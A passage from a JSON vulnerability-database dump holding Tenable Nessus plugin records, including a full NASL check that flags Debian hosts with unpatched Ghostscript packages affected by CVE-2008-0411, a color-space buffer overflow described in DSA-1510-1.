pkgname:\"libgs-dev\", pkgver:\"8.61.dfsg.1~svn8187-0ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"libgs-esp-dev\", pkgver:\"8.61.dfsg.1~svn8187-0ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"libgs8\", pkgver:\"8.61.dfsg.1~svn8187-0ubuntu3.4\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ghostscript / ghostscript-doc / ghostscript-x / gs / gs-aladdin / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:44:57", "description": "Chris Evans discovered a buffer overflow in the color space handling\ncode of the Ghostscript PostScript/PDF interpreter, which might result\nin the execution of arbitrary code if a user is tricked into\nprocessing a malformed file.", "edition": 27, "published": "2008-02-28T00:00:00", "title": "Debian DSA-1510-1 : ghostscript - buffer overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0411"], "modified": "2008-02-28T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:4.0", "cpe:/o:debian:debian_linux:3.1", "p-cpe:/a:debian:debian_linux:gs-gpl", "p-cpe:/a:debian:debian_linux:gs-esp"], "id": "DEBIAN_DSA-1510.NASL", "href": "https://www.tenable.com/plugins/nessus/31303", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1510. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(31303);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-0411\");\n script_xref(name:\"DSA\", value:\"1510\");\n\n script_name(english:\"Debian DSA-1510-1 : ghostscript - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Chris Evans discovered a buffer overflow in the color space handling\ncode of the Ghostscript PostScript/PDF interpreter, which might result\nin the execution of arbitrary code if a user is tricked into\nprocessing a malformed file.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2008/dsa-1510\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the gs-esp and gs-gpl packages.\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 8.54.dfsg.1-5etch1 of gs-gpl and 8.15.3.dfsg.1-1etch1 of\ngs-esp.\n\nFor the old stable distribution (sarge), this problem has been fixed\nin version 8.01-6 of gs-gpl and 7.07.1-9sarge1 of gs-esp.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:gs-esp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:gs-gpl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/02/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/02/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"gs\", reference:\"8.01-6\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"gs-esp\", reference:\"7.07.1-9sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"gs-gpl\", reference:\"8.01-6\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"gs\", reference:\"8.54.dfsg.1-5etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"gs-esp\", reference:\"8.15.3.dfsg.1-1etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"gs-gpl\", reference:\"8.54.dfsg.1-5etch1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}